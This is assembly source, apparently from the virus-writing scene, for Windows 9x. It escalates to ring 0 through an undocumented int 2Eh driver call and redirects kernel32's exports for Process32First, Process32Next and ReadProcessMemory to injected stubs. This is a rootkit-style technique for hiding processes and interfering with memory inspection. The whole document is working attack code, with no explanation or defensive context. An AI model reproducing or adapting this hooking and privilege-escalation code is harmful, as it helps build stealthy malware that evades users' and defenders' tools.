; ; API hooking via export table redirecting! ; ; ; muzic: Pasquale Maassen - Destruction ; coder: daemon ; lang : assembler ; os : w9x ONLY! .586p .Model Flat extrn ExitProcess : PROC extrn MessageBoxA : PROC extrn LoadLibraryA : PROC extrn GetProcAddress : PROC include ntos.inc .Data caption db "daemon",0 save_base dd ? save_export dd ? save_here dd ? save_original dd ? stk dd offset x1 dd offset x2 x1 db 8 dup (0) dd offset x3 x2 db 60h dup (0) dd offset x4+24h x4 db 18h dup (0) x3 db 38h dup (0) dd r0proc already_hooked dd ? api_to_hook dd ? target_pos dd ? api_1 db "Process32First",0 api_2 db "Process32Next",0 api_3 db "ReadProcessMemory",0 .Code main: mov target_pos,0400h lea eax,api_2 call hook_api mov target_pos,0500h lea eax,api_1 call hook_api mov target_pos,0600h lea eax,api_3 call hook_api call ExitProcess ;---------------------------------------------------------- ; ; HOOK ANY API IN KERNEL32.DLL ; ; input: eax = pointer to name of api ; target_pos = value where to put the shit! ; ;---------------------------------------------------------- hook_api: pushad call delta_me delta_me:pop ebp sub ebp,offset delta_me mov [ebp+already_hooked],0 mov [ebp+api_to_hook],eax call get_k32 db "kernel32.dll",0 get_k32:call LoadLibraryA mov [ebp+save_base],eax mov ebx,eax mov ecx,ebx mov edx,ecx push edx add ebx,[ebx+03ch] ; point to pe-header add ecx,[ebx+078h] ; point to export table now mov [ebp+save_export],ecx add edx,[ecx+020h] ; point edx to addressofnames! mov esi,edx pop edx xor ecx,ecx dec ecx ;----------------------------------------------------------------- ; search the position now of our api! ; ; no error checking in here :(((( ; be aware of the cruely exception handler ;-))) ;----------------------------------------------------------------- again: inc ecx lodsd add eax,edx pushad mov esi,eax xor ecx,ecx push esi hohi: lodsb inc ecx test al,al jnz hohi pop esi mov edi,[ebp+api_to_hook] repz cmpsb test ecx,ecx jz found_ popad jmp again found_: popad ;----------------------------------------------------------------- ; okay position found! ; ; now locate the function ;----------------------------------------------------------------- done: mov esi,[ebp+save_export] mov esi,[esi+24h] ; addressofnameordinals add esi,edx mov ax,word ptr [esi+ecx*2] ; get counter and eax,0FFFFh mov esi,[ebp+save_export] mov esi,[esi+1ch] ; addressoffunctions add esi,edx lea ebx,[eax*4+esi] push eax mov eax,[ebp+target_pos] cmp dword ptr [ebx],eax jne not_hooked inc already_hooked not_hooked: pop eax mov [ebp+save_here],ebx lea esi,dword ptr [ebp+r0proc] call callring0 mov eax,[ebp+save_base] mov ebx,dword ptr [eax+3Ch] add ebx,eax mov ebx,[ebx+78h] lea ebx,[ebx+1Ch+eax] mov ebx,[ebx] add eax,[eax+ebx] push 020060000h ; New page attributes (writ.) push 0 push 1h ; Number of pages mov ebx,[ebp+save_base] and ebx,0FFFFF000h ror ebx,012 push ebx ; page push 00001000Dh ; VxD 1 service D call eax popad ret r0proc: pushad call delta_x delta_x:pop ebp sub ebp,offset delta_x mov ebx,[ebp+save_here] mov eax,[ebx] mov [ebp+save_original],eax add eax,[ebp+save_base] cmp [ebp+already_hooked],0 jne dont_mess mov dword ptr [ebp+replace-4],eax dont_mess: push eax mov eax,[ebp+target_pos] mov dword ptr [ebx],eax pop eax mov edi,[ebp+save_base] cmp [ebp+already_hooked],0 je normal mov ecx,offset n - offset hook_process32_first jmp normal2 normal: mov ecx,offset hook_ende-offset hook_process32_first normal2:lea esi,[ebp+hook_process32_first] add edi,[ebp+target_pos] repz movsb popad ret hook_process32_first: pushad call get_delta get_delta:pop ebp sub ebp,offset get_delta lea eax,[ebp+replace2] mov ebx,[esp+020h] mov dword ptr [ebp+replace2-4],ebx lea eax,[ebp+replace+1] mov [esp+020h],eax popad n: push 012345678h replace:ret pushad ; mov edi,[esp+4h] ; mov edi,[esp+8h+020h] ; and dword ptr [edi+08h],0 ; lea edi,[edi+024h] ; mov esi,edi ;k_boy: lodsd ; test eax,eax ; jz done_1 ; mov eax,'KCUF' ; stosd ; jmp k_boy done_1: popad xor eax,eax push 012345678h replace2:ret hook_ende equ $ ;------------------------------------------------------------ ; ; and the illegal ring 0 routine! ; ;------------------------------------------------------------ callring0: pusha call @@X pusha call dword ptr [ecx] popa ret 8 @@X: sub esp, 14h xor eax, eax push eax lea edx, [esp+24h] push edx sub esp, 54h lea edx, [esp+38h] push edx push edx push esi mov edx, esp push edx push edx mov edx, esp mov al, i2E_PoCallDriver int 2Eh add esp, 88h popa ret End Main ;End of code, Main is the entrypoint